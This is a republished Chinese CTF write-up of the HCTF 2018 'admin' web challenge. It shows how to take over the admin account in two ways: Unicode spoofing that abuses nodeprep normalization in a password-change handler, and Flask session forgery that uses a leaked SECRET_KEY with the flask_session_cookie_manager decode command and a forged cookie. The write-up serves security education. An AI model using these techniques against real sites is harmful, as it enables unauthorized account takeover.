碼上快樂

相關內容    簡體    繁體

HCTF 2018]admin

本文轉載自   查看原文   2020-05-12 10:49   818    CTF/ unicode欺騙/ session偽造

 

知識點

  • unicode欺騙
  • session偽造

解法一:unicode欺騙
查看源碼發現

<!-- you are not admin -->

 

應該是要注冊成admin用戶
先注冊一個admin1用戶,登錄后在change password頁面查看源碼,發現

 <!-- https://github.com/woadsl1234/hctf_flask/ -->

 

訪問后可取得源碼,部分源碼如下

def change():
    if not current_user.is_authenticated:
        return redirect(url_for('login'))
    form = NewpasswordForm()
    if request.method == 'POST':
        name = strlower(session['name'])
        user = User.query.filter_by(username=name).first()
        user.set_password(form.newpassword.data)
        db.session.commit()
        flash('change successful')
        return redirect(url_for('index'))
    return render_template('change.html', title = 'change', form = form)
def strlower(username):
    username = nodeprep.prepare(username)
    return username

 

發現重定義了strlower函數,使用nodeprep.prepare進行轉換
即存在

ᴬᴰᴹᴵᴺ -> ADMIN -> admin

 


注意到

name = strlower(session['name'])

 


即可以注冊ᴬᴰᴹᴵᴺ ,修改ᴬᴰᴹᴵᴺ 即修改admin的密碼
修改密碼后使用admin賬戶登錄即可獲取flag
解法二:session偽造
注冊一個admin1用戶,登錄后使用burpsuite抓包得到session

.eJw9kEGLwjAUhP_KkrOHNnYvgodKusXCS6iklvcu4mrd5rVxoSrViP99i4c9zsB8zMxT7E5Dc2nF4jrcmpnYuaNYPMXHt1gIUF0wNo2RcUTbO7RZRLZtiY8OWbcYskB-4zBUI4TqYfIsMXbrjCofWlajtoeRFEQYIAbWTH7yJASQmx44jbTMIqzLOdl0JF51xOsACh960sYWHTBKo9JPsKte-w2DJ0e-lFhnd-RqnHKJVj1DjUvxmonDZTjtrr9dc_6foPMtk_oJJi_nui6Yphpg13etihZk0ZLaOsq_GFQZjDokYFOJ5fKNO-99MyH2R-_OsZiJ26UZ3veIOBavPwJ9ZlU.Xhpxig.hIQoJq3OWXbaekJ3fHF0Tl1cQPQ

 

在解法一獲取的源碼中,於config.py處獲得SECRET_KEY為ckj123

import os

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

 

使用flask_session_cookie_manager解碼session

py -3 flask_session_cookie_manager3.py decode -s "ckj123" -c ".eJw9kEGLwjAUhP_KkrOHNnYvgodKusXCS6iklvcu4mrd5rVxoSrViP99i4c9zsB8zMxT7E5Dc2nF4jrcmpnYuaNYPMXHt1gIUF0wNo2RcUTbO7RZRLZtiY8OWbcYskB-4zBUI4TqYfIsMXbrjCofWlajtoeRFEQYIAbWTH7yJASQmx44jbTMIqzLOdl0JF51xOsACh960sYWHTBKo9JPsKte-w2DJ0e-lFhnd-RqnHKJVj1DjUvxmonDZTjtrr9dc_6foPMtk_oJJi_nui6Yphpg13etihZk0ZLaOsq_GFQZjDokYFOJ5fKNO-99MyH2R-_OsZiJ26UZ3veIOBavPwJ9ZlU.Xhpxig.hIQoJq3OWXbaekJ3fHF0Tl1cQPQ"

 

獲得

{'_fresh': True, '_id': b'093905b60a9ba14e8af7bb3ac13fdbc503528a895b8427e0570d34c3523cfe07c33de2047a4ad7e00f0df2306250092d26680910e6dc2fbfd6aa1b50e0849c1f', 'csrf_token': b'4ecd838d75bcf3c12142a3bad5bdac043878106a', 'name': 'admin1', 'user_id': '11'}

 

將其中的admin1修改為admin,再使用flask_session_cookie_manager進行編碼可得偽造后的session

.eJw9kEGLwjAUhP_KkrOHNnYvgodKusXCS6iklvcu4mrd5rVxoSrViP99i4c9zsB8zMxT7E5Dc2nF4jrcmpnYuaNYPMXHt1gIUF0wNo2RcUTbO7RZRLZtiY8OWbcYskB-4zBUI4TqYfIsMXbrjCofWlajtoeRFEQYIAbWTH7yJASQmx44jbTMIqzLOdl0JF51xOsACh960sYWHTBKo9JPsKte-w2DJ0e-lFhnd-RqnHKJVj1DjUvxmonDZTjtrr9dc_6foPMtk_oJJi_nui6Yphpg13etihZk0ZLaOsq_GFQZjDokYFOJ5fKNO-99MyH2R-_OYiZul2Z4vyPiWLz-AJ2yZiQ.XhqBtg.lLXBoac_fjTFLmMF5T4b90nw3rM

 

將其復制后重放,即可得到flag
在這里插入圖片描述

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 BUUCTF | [HCTF 2018]admin HCTF2018-admin[flask session 偽造] unicode欺騙—— hctf - admin [原題復現]2018HCTF WEB admin(session偽造、unicode漏洞、條件競爭) [HCTF 2018]WarmUp 刷題[HCTF 2018]WarmUp hctf2018wp復現 BUUCTF-[HCTF 2018]WarmUp [BUUOJ記錄] [HCTF 2018]WarmUp [原題復現]HCTF 2018 Warmup(文件包含)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM